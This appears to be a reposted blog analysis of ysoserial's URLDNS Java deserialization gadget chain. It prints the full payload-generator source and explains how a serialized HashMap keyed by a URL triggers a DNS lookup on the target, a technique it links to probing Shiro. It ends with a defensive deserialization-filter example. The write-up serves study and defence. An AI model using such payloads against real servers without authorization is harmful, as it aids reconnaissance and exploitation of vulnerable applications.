yso URLDNS in the pop chain analysis

Recently, in an interview I was asked how the URLDNS pop chain in ysoserial works; the interview came around to this because it touched on Shiro, how to detect it and how to attack it. In practice, JRMP is actually more accurate than URLDNS (I'll cover that trick later).

At the time I had not analyzed URLDNS or JRMP, so when asked about the URLDNS pop chain I had no idea and could not answer. So now I'll analyze the URLDNS code.

package ysoserial.payloads;

import java.io.IOException;
import java.net.InetAddress;
import java.net.URL;
import java.net.URLConnection;
import java.net.URLStreamHandler;
import java.util.HashMap;

import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;

public class URLDNS implements ObjectPayload<Object> {

        public Object getObject(final String url) throws Exception {

                // Avoid DNS resolution during payload creation.
                // Since the field java.net.URL.handler is transient, it will not be part of the serialized payload.
                URLStreamHandler handler = new SilentURLStreamHandler();

                HashMap ht = new HashMap(); // HashMap that will contain the URL
                URL u = new URL(null, url, handler); // URL to use as the key
                ht.put(u, url); // The value can be anything that is Serializable; the URL as the key is what triggers the DNS lookup.

                // During the put above, the URL's hashCode is calculated and cached. This resets it so that
                // the next time hashCode() is called (inside HashMap.readObject on the target) a DNS lookup is triggered.
                Reflections.setFieldValue(u, "hashCode", -1);

                return ht;
        }

        public static void main(final String[] args) throws Exception {
                PayloadRunner.run(URLDNS.class, args);
        }

        /**
         * <p>This instance of URLStreamHandler is used to avoid any DNS resolution while creating the URL instance.
         * DNS resolution is used for vulnerability detection. It is important not to probe the given URL prior
         * to using the serialized object.</p>
         *
         * <b>Potential false negative:</b>
         * <p>If the DNS name is resolved first from the tester's computer, the targeted server might get a cache hit on the
         * second resolution.</p>
         */
        static class SilentURLStreamHandler extends URLStreamHandler {

                protected URLConnection openConnection(URL u) throws IOException {
                        return null;
                }

                protected synchronized InetAddress getHostAddress(URL u) {
                        return null;
                }
        }
}

The chain given in the source comments is easy to follow:

Gadget Chain:
* HashMap.readObject()
* HashMap.putVal()
* HashMap.hash()
* URL.hashCode()

Now let's follow the comments for a detailed analysis.
First: URLStreamHandler. I quote someone else's description of this class.

      In general, the format of a URL is: protocol://[authority]hostname:port/resource?queryString. The URL class can parse out the protocol, hostname, port and other information. The protocol determines how the interaction happens; for common protocols such as HTTP, File and FTP, the JDK comes with default communication implementations, and custom implementations are of course allowed. Hostname and port are generally used for Socket or other Socket-based communication protocols. Resource is the resource context. Readers can use URL to read and write the specified resource by specifying the protocol, such as the JDK's built-in handling of HTTP, File, FTP and other protocols.

      After a URL instance is successfully constructed, the URL API defines an openConnection() method that returns an instance of the abstract type java.net.URLConnection. However, the URL object is a proxy; the actual call is to the openConnection() method of the java.net.URLStreamHandler object.

  I think it can be understood like this: URLStreamHandler handler = new SilentURLStreamHandler(); initializes an instance, and when the URL is used, different methods of this class are called depending on the operation. openConnection and getHostAddress are customizable; a custom protocol can be described, and custom protocols can do custom operations.

  Next, a HashMap instance.

  URL u = new URL(null, url, handler); according to the comments, this means our controlled url becomes the key of the HashMap instance.

  u is a URL instance; its main operations are dispatched to the handler corresponding to the url. Its fields are as follows:

  Then the controlled url becomes the value.

  ht.put(u, url); this just passes the key and value into the HashMap.

  For an understanding of HashMap, see this article: https://www.breakyizhan.com/java/4653.html

  The final contents of ht are:

  Simply put, ht is built into a HashMap instance whose key is the URL instance (carrying its parsed context) and whose value is simply the url string.

  This HashMap is then serialized, and when it is deserialized, HashMap.readObject() rehashes the key, URL.hashCode() runs with the cached value reset to -1, and the lookup of this domain name is triggered.

  ser is the byte stream content that gets deserialized.
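As an added example (not part of the original post or of ysoserial), here is the defensive counterpart: the same URL-keyed HashMap is serialized with a quiet handler, then deserialized behind a JDK 9+ ObjectInputFilter (JEP 290) that rejects java.net.URL, so HashMap.readObject() is stopped before it reaches putVal()/hash() and URL.hashCode() never runs. The class name UrlDnsFilterDemo and the hostname are constructed for this demo.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.net.InetAddress;
import java.net.URL;
import java.net.URLConnection;
import java.net.URLStreamHandler;
import java.util.HashMap;

public class UrlDnsFilterDemo {

    // Same idea as SilentURLStreamHandler above: no resolution while the map is built.
    static class QuietHandler extends URLStreamHandler {
        @Override protected URLConnection openConnection(URL u) { return null; }
        @Override protected synchronized InetAddress getHostAddress(URL u) { return null; }
    }

    // Serialize a HashMap whose key is a java.net.URL (constructed hostname, never resolved).
    static byte[] serializeUrlMap() throws IOException {
        HashMap<URL, String> ht = new HashMap<>();
        ht.put(new URL(null, "http://constructed-host.invalid/", new QuietHandler()), "anything");
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(ht);
        }
        return bos.toByteArray();
    }

    // Deserialize behind a JEP 290 filter. The filter is consulted for every class descriptor
    // as it is read, so java.net.URL is refused while HashMap.readObject() is still reading the
    // key, before putVal()/hash() and therefore before URL.hashCode() can trigger a DNS lookup.
    static String deserializeFiltered(byte[] data) throws IOException, ClassNotFoundException {
        ObjectInputFilter filter = ObjectInputFilter.Config.createFilter(
                "!java.net.URL;java.util.HashMap;java.lang.*;!*");
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            ois.setObjectInputFilter(filter);
            ois.readObject();
            return "accepted";
        } catch (InvalidClassException e) {
            return "rejected: " + e.getMessage(); // "filter status: REJECTED"
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println(deserializeFiltered(serializeUrlMap()));
    }
}
```

The same pattern can be applied process-wide with the jdk.serialFilter system property instead of per-stream; the trailing !* denies every class not explicitly allowed.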


Origin www.cnblogs.com/ph4nt0mer/p/11994384.html